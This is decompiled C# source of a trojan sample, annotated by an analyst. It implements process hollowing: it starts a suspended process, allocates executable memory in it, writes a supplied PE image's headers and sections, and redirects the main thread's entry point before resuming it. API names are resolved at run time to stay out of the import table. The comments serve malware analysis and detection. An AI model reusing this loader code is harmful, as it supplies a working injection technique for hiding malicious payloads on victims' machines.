// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Ressource, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7A61D5AB-B799-4526-BF58-A6DA1297213F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515.exe

using System;
using System.Runtime.InteropServices;

// Analyst annotation (all identifiers are obfuscated private-use code points).
// The one public method starts a second program with creation-flag value 4, writes the
// PE image supplied as a byte array into that process, edits the main thread's context
// and then calls a thread-handle function. This call sequence is the pattern catalogued
// as process hollowing (MITRE ATT&CK T1055.012).
// The Win32 function names are not visible here: they are produced at run time by
// \uE00B.\uE000(int), a string-decoding helper defined outside this file. The API names
// given below are inferred from the delegate signatures and should be confirmed by
// decoding those strings.
// Telemetry worth correlating for detection: a child process created suspended by a
// managed host, cross-process memory allocation/writes into it, and a thread-context
// change before its first resume.
internal class \uE00A
{
  // Declared P/Invoke: kernel32 GetProcAddress (module handle, export name).
  [DllImport("kernel32", EntryPoint = "GetProcAddress")]
  private static extern IntPtr \uE000(IntPtr _param0, string _param1);

  // Declared P/Invoke: kernel32 GetModuleHandle (module name).
  [DllImport("kernel32", EntryPoint = "GetModuleHandle")]
  private static extern IntPtr \uE000(string _param0);

  /// <summary>
  /// Loads the PE image in <paramref name="_param0"/> into a newly created process.
  /// Returns silently if the header magics do not match or the allocation call fails;
  /// every other call result is stored in an unused temporary (num1..num8).
  /// </summary>
  /// <param name="_param0">Raw bytes of the PE file to be mapped into the new process.</param>
  /// <param name="_param1">Passed as the lpCommandLine argument of the process-creation call.</param>
  /// <param name="_param2">Passed as the lpApplicationName argument of the process-creation call.</param>
  public static void \uE000(byte[] _param0, string _param1, string _param2)
  {
    // local1..local3 are never read; they look like decompiler artifacts.
    \uE00A.\uE017 obj = new \uE00A.\uE017();
    ref \uE00A.\uE017 local1 = ref obj;
    \uE00A.\uE01B structure1 = new \uE00A.\uE01B();
    ref \uE00A.\uE01B local2 = ref structure1;
    \uE00A.\uE01E structure2 = new \uE00A.\uE01E();
    ref \uE00A.\uE01E local3 = ref structure2;
    \uE00A.\uE014 lpStartupInfo = new \uE00A.\uE014();
    \uE00A.\uE015 lpProcessInformation = new \uE00A.\uE015();
    \uE00A.\uE01D lpContext = new \uE00A.\uE01D();
    // First field of the startup structure receives the structure's own marshalled size.
    lpStartupInfo.\uE000 = (uint) Marshal.SizeOf((object) lpStartupInfo);
    // 65543 == 0x00010007; presumably the x86 CONTEXT_FULL flag set — TODO confirm.
    lpContext.\uE000 = 65543U;
    // The buffer address is narrowed to a 32-bit int, and the structures below follow
    // 32-bit layouts, so the sample presumably targets an x86 process — relevant when
    // choosing a detonation environment.
    GCHandle gcHandle = GCHandle.Alloc((object) _param0, GCHandleType.Pinned);
    int int32 = gcHandle.AddrOfPinnedObject().ToInt32();
    gcHandle.Free();
    // Overlay the first header on the buffer, then the second header at the offset held
    // in the first header's last field (\uE012).
    obj = (\uE00A.\uE017) Marshal.PtrToStructure((IntPtr) int32, typeof (\uE00A.\uE017));
    structure1 = (\uE00A.\uE01B) Marshal.PtrToStructure((IntPtr) (int32 + obj.\uE012), typeof (\uE00A.\uE01B));
    // 17744 == 0x4550 ("PE\0\0") and 23117 == 0x5A4D ("MZ"): bail out unless the buffer
    // carries both PE magics.
    if (structure1.\uE000 != 17744U || obj.\uE000 != (ushort) 23117)
      return;
    // Each delegate is bound to an export resolved by name at run time through
    // GetModuleHandle + GetProcAddress, so none of these APIs appears in the import
    // table. Module string index 60 is used for six of them and index 88 for the second.
    // Signature matches CreateProcess (presumably).
    \uE00A.\uE009 forFunctionPointer1 = (\uE00A.\uE009) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(73)), typeof (\uE00A.\uE009));
    // (process handle, base address) from a different module; presumably a section-unmap
    // routine — TODO confirm from the decoded strings.
    \uE00A.\uE00B forFunctionPointer2 = (\uE00A.\uE00B) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(88)), \uE00B.\uE000(98)), typeof (\uE00A.\uE00B));
    // Signature matches VirtualAllocEx (presumably); declared here as returning bool.
    \uE00A.\uE00C forFunctionPointer3 = (\uE00A.\uE00C) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(119)), typeof (\uE00A.\uE00C));
    // Signature matches WriteProcessMemory (presumably).
    \uE00A.\uE00A forFunctionPointer4 = (\uE00A.\uE00A) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(134)), typeof (\uE00A.\uE00A));
    // Signature matches GetThreadContext (presumably).
    \uE00A.\uE00D forFunctionPointer5 = (\uE00A.\uE00D) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(153)), typeof (\uE00A.\uE00D));
    // Signature matches SetThreadContext (presumably).
    \uE00A.\uE00E forFunctionPointer6 = (\uE00A.\uE00E) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(170)), typeof (\uE00A.\uE00E));
    // Signature matches ResumeThread (presumably).
    \uE00A.\uE00F forFunctionPointer7 = (\uE00A.\uE00F) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(187)), typeof (\uE00A.\uE00F));
    // Create the host process with flag value 4 (presumably CREATE_SUSPENDED); handles
    // come back in lpProcessInformation.
    int num1 = forFunctionPointer1(_param2, _param1, IntPtr.Zero, IntPtr.Zero, false, \uE00A.\uE010.\uE009, IntPtr.Zero, (string) null, ref lpStartupInfo, out lpProcessInformation) ? 1 : 0;
    // Call the (handle, address) routine at the base address recorded in the payload's
    // optional header (\uE002.\uE009).
    int num2 = forFunctionPointer2(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009) ? 1 : 0;
    // Allocate \uE002.\uE013 bytes at that same address with allocation type
    // 4096 | 8192 and protection value 64 (presumably MEM_COMMIT | MEM_RESERVE and
    // PAGE_EXECUTE_READWRITE); the only other early-exit point.
    if (!forFunctionPointer3(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009, structure1.\uE002.\uE013, \uE00A.\uE013.\uE000 | \uE00A.\uE013.\uE001, \uE00A.\uE012.\uE002))
      return;
    // Write the first \uE002.\uE014 bytes of the payload (presumably the PE headers) to
    // the allocated base.
    int num3 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009, _param0, structure1.\uE002.\uE014, (object) null) ? 1 : 0;
    // Walk the section table that follows the second header; the count comes from
    // \uE001.\uE001.
    for (int index1 = 0; index1 <= (int) structure1.\uE001.\uE001 - 1; ++index1)
    {
      structure2 = (\uE00A.\uE01E) Marshal.PtrToStructure((IntPtr) (int32 + obj.\uE012 + Marshal.SizeOf((object) structure1) + Marshal.SizeOf((object) structure2) * index1), typeof (\uE00A.\uE01E));
      // Copy \uE003 bytes starting at payload offset \uE004 into a scratch buffer.
      byte[] lpBuffer = new byte[(IntPtr) structure2.\uE003];
      for (int index2 = 0; index2 <= (int) structure2.\uE003 - 1; ++index2)
        lpBuffer[index2] = _param0[(long) structure2.\uE004 + (long) index2];
      // Write the section to base + \uE002 in the new process.
      int num4 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) (structure1.\uE002.\uE009 + structure2.\uE002), lpBuffer, structure2.\uE003, (object) null) ? 1 : 0;
    }
    // Read the context of the thread returned by the creation call.
    int num5 = forFunctionPointer5(lpProcessInformation.\uE001, ref lpContext) ? 1 : 0;
    // Write the payload's base address into the new process at (context field \uE00E + 8).
    // NOTE(review): in the x86 CONTEXT layout that field position lines up with Ebx and
    // offset 8 with the PEB image-base slot — confirm against the struct layout.
    byte[] bytes = BitConverter.GetBytes(structure1.\uE002.\uE009);
    int num6 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) (lpContext.\uE00E + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0;
    // Context field \uE011 is set to base + \uE002.\uE006 (presumably the entry-point
    // RVA, making this the address where the thread will start).
    lpContext.\uE011 = structure1.\uE002.\uE009 + structure1.\uE002.\uE006;
    int num7 = forFunctionPointer6(lpProcessInformation.\uE001, ref lpContext) ? 1 : 0;
    // Final call takes only the thread handle; presumably resumes the thread.
    int num8 = (int) forFunctionPointer7(lpProcessInformation.\uE001);
  }

  // Parameter names survived obfuscation and match CreateProcess.
  private delegate bool \uE009(
    string lpApplicationName,
    string lpCommandLine,
    IntPtr lpProcessAttributes,
    IntPtr lpThreadAttributes,
    bool bInheritHandles,
    \uE00A.\uE010 dwCreationFlags,
    IntPtr lpEnvironment,
    string lpCurrentDirectory,
    ref \uE00A.\uE014 lpStartupInfo,
    out \uE00A.\uE015 lpProcessInformation);

  // Parameter names match WriteProcessMemory; the last argument is always passed as null.
  private delegate bool \uE00A(
    IntPtr hProcess,
    IntPtr lpBaseAddress,
    byte[] lpBuffer,
    uint nSize,
    object lpNumberOfBytesWritten);

  // Two-argument (process handle, base address) routine; name not recoverable from here.
  private delegate bool \uE00B(IntPtr hProcess, IntPtr lpBaseAddress);

  // Parameter names match VirtualAllocEx.
  private delegate bool \uE00C(
    IntPtr hProcess,
    IntPtr lpAddress,
    uint dwSize,
    \uE00A.\uE013 flAllocationType,
    \uE00A.\uE012 flProtect);

  // Parameter names match GetThreadContext.
  private delegate bool \uE00D(IntPtr hThread, ref \uE00A.\uE01D lpContext);

  // Parameter names match SetThreadContext.
  private delegate bool \uE00E(IntPtr hThread, [In] ref \uE00A.\uE01D lpContext);

  // Single thread-handle argument, uint result; presumably ResumeThread.
  private delegate uint \uE00F(IntPtr hThread);

  // Values line up with the Win32 process-creation flags (presumably). Only \uE009 (4)
  // is used in this file.
  private enum \uE010 : uint
  {
    \uE00C = 1,
    \uE00B = 2,
    \uE009 = 4,
    \uE00D = 8,
    \uE002 = 16, // 0x00000010
    \uE003 = 512, // 0x00000200
    \uE00A = 1024, // 0x00000400
    \uE007 = 2048, // 0x00000800
    \uE008 = 4096, // 0x00001000
    \uE00F = 65536, // 0x00010000
    \uE005 = 262144, // 0x00040000
    \uE00E = 524288, // 0x00080000
    \uE000 = 16777216, // 0x01000000
    \uE006 = 33554432, // 0x02000000
    \uE001 = 67108864, // 0x04000000
    \uE004 = 134217728, // 0x08000000
  }

  // Values line up with the x86 CONTEXT_* flags (presumably). Not referenced in this
  // file; the method uses the literal 65543 instead.
  private enum \uE011 : uint
  {
    \uE000 = 65536, // 0x00010000
    \uE001 = 65536, // 0x00010000
    \uE002 = 65537, // 0x00010001
    \uE003 = 65538, // 0x00010002
    \uE004 = 65540, // 0x00010004
    \uE008 = 65543, // 0x00010007
    \uE005 = 65544, // 0x00010008
    \uE006 = 65552, // 0x00010010
    \uE007 = 65568, // 0x00010020
    \uE009 = 65599, // 0x0001003F
  }

  // Values line up with the Win32 memory-protection constants (presumably). Only
  // \uE002 (64) is used in this file.
  private enum \uE012 : uint
  {
    \uE004 = 1,
    \uE005 = 2,
    \uE006 = 4,
    \uE007 = 8,
    \uE000 = 16, // 0x00000010
    \uE001 = 32, // 0x00000020
    \uE002 = 64, // 0x00000040
    \uE003 = 128, // 0x00000080
    \uE008 = 256, // 0x00000100
    \uE009 = 512, // 0x00000200
    \uE00A = 1024, // 0x00000400
  }

  // Values line up with the Win32 allocation-type constants (presumably). \uE000 (4096)
  // and \uE001 (8192) are OR-ed together in the allocation call.
  private enum \uE013 : uint
  {
    \uE000 = 4096, // 0x00001000
    \uE001 = 8192, // 0x00002000
    \uE002 = 524288, // 0x00080000
    \uE005 = 1048576, // 0x00100000
    \uE006 = 2097152, // 0x00200000
    \uE004 = 4194304, // 0x00400000
    \uE003 = 536870912, // 0x20000000
  }

  // Field layout matches STARTUPINFO (presumably); only \uE000 (size) is ever set.
  private struct \uE014
  {
    public uint \uE000;
    public string \uE001;
    public string \uE002;
    public string \uE003;
    public uint \uE004;
    public uint \uE005;
    public uint \uE006;
    public uint \uE007;
    public uint \uE008;
    public uint \uE009;
    public uint \uE00A;
    public uint \uE00B;
    public short \uE00C;
    public short \uE00D;
    public IntPtr \uE00E;
    public IntPtr \uE00F;
    public IntPtr \uE010;
    public IntPtr \uE011;
  }

  // Field layout matches PROCESS_INFORMATION (presumably): \uE000 is used as the
  // process handle and \uE001 as the thread handle.
  private struct \uE015
  {
    public IntPtr \uE000;
    public IntPtr \uE001;
    public uint \uE002;
    public uint \uE003;
  }

  // Not referenced in this file; layout resembles SECURITY_ATTRIBUTES (presumably).
  private struct \uE016
  {
    public int \uE000;
    public IntPtr \uE001;
    public bool \uE002;
  }

  // Overlaid on the start of the payload: \uE000 is compared with 0x5A4D and \uE012
  // is used as the offset of the second header, matching IMAGE_DOS_HEADER (presumably).
  private struct \uE017
  {
    public ushort \uE000;
    public ushort \uE001;
    public ushort \uE002;
    public ushort \uE003;
    public ushort \uE004;
    public ushort \uE005;
    public ushort \uE006;
    public ushort \uE007;
    public ushort \uE008;
    public ushort \uE009;
    public ushort \uE00A;
    public ushort \uE00B;
    public ushort \uE00C;
    public ushort \uE00D;
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
    public ushort[] \uE00E;
    public ushort \uE00F;
    public ushort \uE010;
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
    public ushort[] \uE011;
    public int \uE012;
  }

  // Layout matches IMAGE_FILE_HEADER (presumably); \uE001 is read as the section count.
  private struct \uE018
  {
    public ushort \uE000;
    public ushort \uE001;
    public uint \uE002;
    public uint \uE003;
    public uint \uE004;
    public ushort \uE005;
    public ushort \uE006;
  }

  // Two-uint entry used 16 times in \uE01A; presumably IMAGE_DATA_DIRECTORY.
  private struct \uE019
  {
    public uint \uE000;
    public uint \uE001;
  }

  // Layout matches the 32-bit IMAGE_OPTIONAL_HEADER (presumably). Fields read by the
  // method: \uE006 (added to the base for the start address), \uE009 (base address),
  // \uE013 (allocation size), \uE014 (header byte count).
  private struct \uE01A
  {
    public ushort \uE000;
    public byte \uE001;
    public byte \uE002;
    public uint \uE003;
    public uint \uE004;
    public uint \uE005;
    public uint \uE006;
    public uint \uE007;
    public uint \uE008;
    public uint \uE009;
    public uint \uE00A;
    public uint \uE00B;
    public ushort \uE00C;
    public ushort \uE00D;
    public ushort \uE00E;
    public ushort \uE00F;
    public ushort \uE010;
    public ushort \uE011;
    public uint \uE012;
    public uint \uE013;
    public uint \uE014;
    public uint \uE015;
    public ushort \uE016;
    public ushort \uE017;
    public uint \uE018;
    public uint \uE019;
    public uint \uE01A;
    public uint \uE01B;
    public uint \uE01C;
    public uint \uE01D;
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
    public \uE00A.\uE019[] \uE01E;
  }

  // Signature (compared with 0x4550) followed by the two header structures; matches
  // IMAGE_NT_HEADERS (presumably).
  private struct \uE01B
  {
    public uint \uE000;
    public \uE00A.\uE018 \uE001;
    public \uE00A.\uE01A \uE002;
  }

  // Embedded in \uE01D; layout resembles the x86 FLOATING_SAVE_AREA (presumably).
  private struct \uE01C
  {
    public uint \uE000;
    public uint \uE001;
    public uint \uE002;
    public uint \uE003;
    public uint \uE004;
    public uint \uE005;
    public uint \uE006;
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
    public byte[] \uE007;
    public uint \uE008;
  }

  // Thread-context structure; layout resembles the x86 CONTEXT (presumably). The method
  // sets \uE000 (flags), reads \uE00E and overwrites \uE011.
  private struct \uE01D
  {
    public uint \uE000;
    public uint \uE001;
    public uint \uE002;
    public uint \uE003;
    public uint \uE004;
    public uint \uE005;
    public uint \uE006;
    public \uE00A.\uE01C \uE007;
    public uint \uE008;
    public uint \uE009;
    public uint \uE00A;
    public uint \uE00B;
    public uint \uE00C;
    public uint \uE00D;
    public uint \uE00E;
    public uint \uE00F;
    public uint \uE010;
    public uint \uE011;
    public uint \uE012;
    public uint \uE013;
    public uint \uE014;
    public uint \uE015;
    public uint \uE016;
    public uint \uE017;
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
    public byte[] \uE018;
  }

  // Section-table entry; layout matches IMAGE_SECTION_HEADER (presumably). The method
  // reads \uE002 (offset from the base), \uE003 (byte count) and \uE004 (payload offset).
  private struct \uE01E
  {
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
    public byte[] \uE000;
    public uint \uE001;
    public uint \uE002;
    public uint \uE003;
    public uint \uE004;
    public uint \uE005;
    public uint \uE006;
    public ushort \uE007;
    public ushort \uE008;
    public uint \uE009;
  }
}